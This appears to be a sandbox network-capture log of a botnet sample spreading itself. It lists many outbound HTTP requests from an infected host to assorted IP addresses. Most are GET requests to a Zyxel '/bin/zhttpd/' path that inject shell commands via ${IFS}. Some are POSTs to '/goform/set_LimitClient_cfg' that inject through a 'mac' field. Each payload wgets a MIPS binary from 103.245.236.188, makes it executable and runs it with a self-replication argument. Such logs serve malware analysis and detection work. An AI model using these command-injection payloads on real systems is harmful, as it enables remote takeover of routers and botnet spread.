                                    Jan 13, 2024 19:02:34.192090988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4507192.168.2.134815670.54.98.204443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.192174911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4508192.168.2.134828072.148.23.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.192200899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4509192.168.2.133924654.112.10.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.192332029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4510192.168.2.133439834.229.145.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.192388058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4511192.168.2.133802677.158.112.235443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.192472935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4512192.168.2.1344154183.212.104.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.192519903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4513192.168.2.134217431.86.182.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.192586899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4514192.168.2.135740051.145.85.179443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.192627907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4515192.168.2.133915213.155.187.128443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.192709923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4516192.168.2.1348016186.184.210.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.192780018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4517192.168.2.135496848.227.252.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.192853928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4518192.168.2.1358256117.61.39.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.192931890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4519192.168.2.133999827.254.33.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.192998886 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4520192.168.2.1334668111.161.1.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.193069935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4521192.168.2.133474639.134.248.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.193137884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4522192.168.2.1354328204.165.237.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.193209887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4523192.168.2.1341402138.127.46.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.193248034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4524192.168.2.1353126166.8.171.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.193315029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4525192.168.2.135494070.232.126.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.193365097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4526192.168.2.133461612.203.249.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.193414927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4527192.168.2.1356758173.111.115.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.193483114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4528192.168.2.135526279.16.123.11443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.193547964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4529192.168.2.1352816150.131.52.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.193624020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4530192.168.2.1353922156.180.171.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.193687916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4531192.168.2.1355248142.146.145.59443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.193780899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4532192.168.2.13543581.227.137.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.193850040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4533192.168.2.134694448.218.168.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.193931103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4534192.168.2.1345618204.77.121.53443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.193969011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4535192.168.2.1353614144.83.62.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.194060087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4536192.168.2.133958438.40.16.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.194129944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4537192.168.2.1358790200.114.19.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.194170952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4538192.168.2.1344742111.14.95.20443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.194271088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4539192.168.2.133874454.95.131.205443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.194344044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4540192.168.2.133871882.76.77.1958080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.424127102 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                    Jan 13, 2024 19:02:34.674678087 CET433INHTTP/1.1 400 Bad Request
                                    Date: Sat, 13 Jan 2024 18:02:27 GMT
                                    Server: Apache
                                    X-Frame-Options: SAMEORIGIN
                                    Content-Length: 226
                                    Connection: close
                                    Content-Type: text/html; charset=iso-8859-1
                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4541192.168.2.1357426172.64.156.1768080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:34.934317112 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                    Jan 13, 2024 19:02:35.439884901 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                    Jan 13, 2024 19:02:35.553076029 CET328INHTTP/1.1 400 Bad Request
                                    Server: cloudflare
                                    Date: Sat, 13 Jan 2024 18:02:35 GMT
                                    Content-Type: text/html
                                    Content-Length: 155
                                    Connection: close
                                    CF-RAY: -
                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4542192.168.2.133476638.181.149.2388080
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.142529964 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                    Jan 13, 2024 19:02:39.343909025 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                    Jan 13, 2024 19:02:45.487879992 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                    Cookie: user=admin
                                    Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                    Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4543192.168.2.1334216125.168.58.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.202980042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4544192.168.2.1360658125.180.207.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.203052998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4545192.168.2.13514285.66.130.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.203166008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4546192.168.2.135212034.183.116.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.203253984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4547192.168.2.134815480.119.163.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.203304052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4548192.168.2.134187638.103.148.137443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.203365088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4549192.168.2.1357350150.143.217.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.203401089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    4550192.168.2.1348736147.193.32.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:35.203474998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


